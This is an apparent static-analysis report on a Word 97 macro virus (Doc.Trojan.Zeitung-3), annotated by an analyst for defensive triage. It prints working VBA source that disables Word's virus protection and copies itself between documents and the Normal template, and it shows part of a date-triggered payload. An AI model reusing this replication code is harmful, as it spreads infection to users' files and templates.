Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a54d976e2fcf6b0a…

MALICIOUS

Office (OLE)

64.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 88682c07198598381525b00dad8a1c81 SHA-1: b3b94f68550a04700990be68a20f76b1c2db5a98 SHA-256: a54d976e2fcf6b0ae9c722d677b4b43d3200930246510fdea1776a77f4d1c65a
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

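The sample is an OLE document containing a large VBA macro. Heuristics flag the presence of macros and, specifically, a Document_Open macro, a common way to run code automatically when a document is opened. The extracted macro code attempts to infect the Normal template and the active document by copying itself between them, which gives it both persistence and propagation. It also sets Options.VirusProtection to False and appends any macros it is about to overwrite to text files in the root of C:\ (C:\NORMAL.TXT and C:\<window caption>.TXT); these are useful host artifacts when triaging an affected machine. In the portion of the script previewed below, persistence goes through the Normal template and no registry Run key or Startup folder write is visible, so T1137.001 (Office Template Macros) describes the observed behaviour more closely than T1547.001. The ClamAV detection as 'Doc.Trojan.Zeitung-3' further supports the malicious verdict.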

Heuristics 3

  • ClamAV: Doc.Trojan.Zeitung-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zeitung-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 71266 bytes
SHA-256: 5b38b9f3fbdbf92d0caac45d2651be1bbd8db3ce78f48dbe5e0bf83a012ed815
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const E_Marker = "VirusZeitung" 'virus signature (translated; original comment is Russian CP1251 text rendered as mojibake)
'èó îäë:ÀêäéÔíðâêé ëêàä ôåî  èàëØòëâ@Âðññçàè ðàè èàåñè,ÀåñíðÅðìâèÌõè ààî
'1
'issue number 1 for the year 2000 (translated from CP1251 mojibake)
' [analyst] Module-level state for the self-replicating macro.
' [analyst] E_Marker is the string NormalKontam/ADokumKontam search for to decide whether a module already carries this code.
' [analyst] NormalKontam/ADokumKontam read module line 3 onward and parse the number after the leading apostrophe.
' [analyst] In this listing that appears to be the '1 line above (Attribute lines are not counted as code-module lines),
' [analyst] so that line is data the macro reads, not only a comment; it is left byte-identical here.
' [analyst] The second comment line decodes from CP1251 to Cyrillic letters that do not form readable text
' [analyst] (it appears scrambled); it is left as found and not interpreted.
' [analyst] ad / nt are later set to the first VBComponent of the active document / Normal template.
' [analyst] In VBA only the last name in each Dim gets the declared type: ad and sd are Variant.
Dim ad, nt As Object
Dim sd, snt As Boolean
 
' [analyst] Reports the "infection level" of the Normal template module held in nt.
' [analyst] Returns 0 when the E_Marker string is not found or the module has fewer than 3 lines,
' [analyst] the number parsed from module line 3 when it is below 65535, and -1 otherwise.
' [analyst] VirusArbeit compares this value with ADokumKontam to choose the copy direction.
Private Function NormalKontam()
 ' [analyst] Find(target, startline, startcol, endline, endcol): search the module text for the marker.
 If Not nt.codemodule.Find(E_Marker, 1, 1, 10000, 10000) Then
  NormalKontam = 0
 Else
  If nt.codemodule.countoflines < 3 Then
   NormalKontam = 0
  Else
   ' [analyst] Take the text from line 3 to the end of the module, then drop its first character
   ' [analyst] (presumably the comment apostrophe) so Val can read the leading number.
   ant$ = Trim(nt.codemodule.lines(3, nt.codemodule.countoflines))
   ant$ = Mid(ant$, 2, Len(ant$) - 1)
   If Val(Trim(ant$)) < 65535 Then
    NormalKontam = Val(Trim(ant$))
   Else
    ' [analyst] Values of 65535 or more are reported as -1.
    NormalKontam = -1
   End If
  End If
 End If
End Function

' [analyst] Same check as NormalKontam, applied to the active document's module held in ad.
' [analyst] Returns 0 when the E_Marker string is not found or the module has fewer than 3 lines,
' [analyst] the number parsed from module line 3 when it is below 65535, and -1 otherwise.
Private Function ADokumKontam()
 ' [analyst] Search the document module for the marker string.
 If Not ad.codemodule.Find(E_Marker, 1, 1, 10000, 10000) Then
  ADokumKontam = 0
 Else
  If ad.codemodule.countoflines < 3 Then
   ADokumKontam = 0
  Else
   ' [analyst] Read from line 3 to the end, strip the first character, and parse the leading number.
   ant$ = Trim(ad.codemodule.lines(3, ad.codemodule.countoflines))
   ant$ = Mid(ant$, 2, Len(ant$) - 1)
   If Val(Trim(ant$)) < 65535 Then
    ADokumKontam = Val(Trim(ant$))
   Else
    ' [analyst] Values of 65535 or more are reported as -1.
    ADokumKontam = -1
   End If
  End If
 End If
End Function

' [analyst] Replication routine: copies the macro module between the Normal template and the active
' [analyst] document, in whichever direction has the lower value from the *Kontam functions.
' [analyst] Observable side effects in this block: Options.VirusProtection is set to False, text files are
' [analyst] appended to in the root of C:\, and the document or Normal template may be saved.
' [analyst] Later Office versions block programmatic access to VBProject unless
' [analyst] "Trust access to the VBA project object model" is enabled; keeping it disabled stops this technique.
Private Sub VirusArbeit()
 ' [analyst] Every runtime error below is suppressed, so failed steps are silent.
 On Error Resume Next
 ' [analyst] Turns off Word's macro virus protection prompt.
 Options.VirusProtection = False
 ' [analyst] First VBA component of the template and of the document (ThisDocument, per VB_Name in this module's header).
 Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
 Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
 ' [analyst] Direction 1: template -> document, only for documents saved in Word document or template format.
 If (ADokumKontam < NormalKontam) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then
  ' [analyst] Remember whether the document had unsaved changes before it is modified.
  sd = ActiveDocument.Saved
  If ad.codemodule.countoflines > 0 Then
   ' [analyst] Host artifact: existing document macros are appended to C:\<window caption>.TXT before deletion.
   Open "C:\" + ActiveDocument.ActiveWindow.Caption + ".TXT" For Append As #1
   ' [analyst] Header string is CP1251 Russian: "Macros that were in the document before the virus was introduced".
   Print #1, "Ìàêðîñû, áûâøèå â äîêóìåíòå äî âíåäðåíèÿ âèðóñà"
   ' [analyst] NOTE: "codumodule" is spelled this way in the sample (elsewhere "codemodule"). With
   ' [analyst] On Error Resume Next active the error is suppressed, so this backup file may not contain
   ' [analyst] the original macros - confirm in dynamic analysis before relying on it for recovery.
   For v = 1 To ad.codumodule.countoflines
    Print #1, ad.codemodule.lines(v, 1)
   Next v
   Close #1
   ' [analyst] The document's existing macro code is removed.
   ad.codemodule.deletelines 1, ad.codemodule.countoflines
  End If
  ' [analyst] Line-by-line copy of the template module into the document module.
  For v = 1 To nt.codemodule.countoflines
   ad.codemodule.insertlines v, nt.codemodule.lines(v, 1)
  Next v
  ' [analyst] Saves only if the document was clean beforehand and its caption does not start with the
  ' [analyst] CP1251 Russian word for "Document" (presumably the default name of a new, unsaved document).
  If (sd = True) And (Mid(ActiveDocument.ActiveWindow.Caption, 1, 8) <> "Äîêóìåíò") Then ActiveDocument.Save
 End If
 
 ' [analyst] Direction 2: document -> Normal template (the persistence step).
 If ADokumKontam > NormalKontam Then
  snt = NormalTemplate.Saved
  If nt.codemodule.countoflines > 0 Then
   ' [analyst] Host artifact: existing template macros are appended to C:\NORMAL.TXT before deletion.
   Open "C:\NORMAL.TXT" For Append As #1
   ' [analyst] Header string is CP1251 Russian: "Macros that were in the Normal.dot template".
   Print #1, "Ìàêðîñû, áûâøèå â øàáëîíå Normal.dot"
   For v = 1 To nt.codemodule.countoflines
    Print #1, nt.codemodule.lines(v, 1)
   Next v
   Close #1
   nt.codemodule.deletelines 1, nt.codemodule.countoflines
  End If
  ' [analyst] Line-by-line copy of the document module into the template module.
  For v = 1 To ad.codemodule.countoflines
   nt.codemodule.insertlines v, ad.codemodule.lines(v, 1)
  Next v
  ' [analyst] The template is saved only if it had no pending changes before the copy.
  If snt = True Then NormalTemplate.Save
 End If
 ' [analyst] Release the component references.
 Set nt = Nothing
 Set ad = Nothing
End Sub

Private Sub HauptArbeit(p)
 Tag$ = ""
 Monat$ = ""
 datum$ = Trim(Date)
 i = 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Tag$ = Tag$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 i = i + 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Monat$ = Monat$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 
 If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then
  p = 2
 End If
 If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then
  p = 2
 End If
 If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then
  p = 2
 End If
 If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then
  p = 2
 End If
 If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then
  p = 2
 End If
 If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then
  p = 2
 End If
 If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then
  p = 2
 End If
 If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then
  p = 2
 End If
  
 If Rnd >= p Then
  Exit Sub
 End If
 Z_Kopf
 
 Druck_0 Artikel_1$(1, 0), 18, True, wdAlignParagraphCenter, 0
 Selection.TypeParagraph
 ab_ = 0
 While Artikel_1$(2, ab_) <> ""
  Druck_0 Artikel_1$(2, ab_), 14, False, wdAlignParagraphJustify, 1.5
  ab_ = ab_ + 1
 Wend
 Selection.TypeParagraph
 Druck_0 A
... (truncated)